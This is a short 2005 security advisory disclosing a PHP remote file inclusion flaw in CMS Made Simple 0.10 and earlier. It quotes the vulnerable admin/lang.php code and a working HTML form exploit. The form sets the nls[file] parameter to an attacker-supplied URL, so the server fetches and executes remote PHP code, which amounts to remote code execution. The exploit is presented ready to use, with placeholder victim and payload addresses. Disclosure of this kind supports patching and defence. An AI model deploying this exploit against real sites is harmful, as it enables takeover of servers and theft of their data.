-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: CMS Made Simple - PHP injection Version <= 0.10 Homepage: http://www.cmsmadesimple.org/ Author: Filip Groszynski (VXSfx) Date: 31 August 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Background: CMS Made Simple is an easy to use content managment system for simple stable content site. Uses PHP, MySQL and Smarty templating system. -------------------------------------------------------- Vulnerable code exist in ./admin/lang.php: <?php ... $current_language = "en_US"; #Only do language stuff for admin pages [!] if (isset($CMS_ADMIN_PAGE)) { ... #Check to see if there is already a language in use... if (isset($_POST["change_cms_lang"])) { [!] $current_language = $_POST["change_cms_lang"]; setcookie("cms_language", $_POST["change_cms_lang"]); } else if (isset($_COOKIE["cms_language"])) { $current_language = $_COOKIE["cms_language"]; } else { ... } #Ok, we have a language to load, let's load it already... if (isset($nls['file'][$current_language])) { foreach ($nls['file'][$current_language] as $onefile) { [!] include($onefile); } } ... } ... ?> -------------------------------------------------------- Exploit: example.html: <form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post> <input type=hidden name=change_cms_lang value=vx> <input type=submit name=test VALUE="do it"> </form> EOF -------------------------------------------------------- Contact: Author: Filip Groszynski (VXSfx) Location: Poland <Warsaw> Email: groszynskif <|> gmail <|> com -- == -- == -- == -- == -- == -- == -- == -- == -- == --
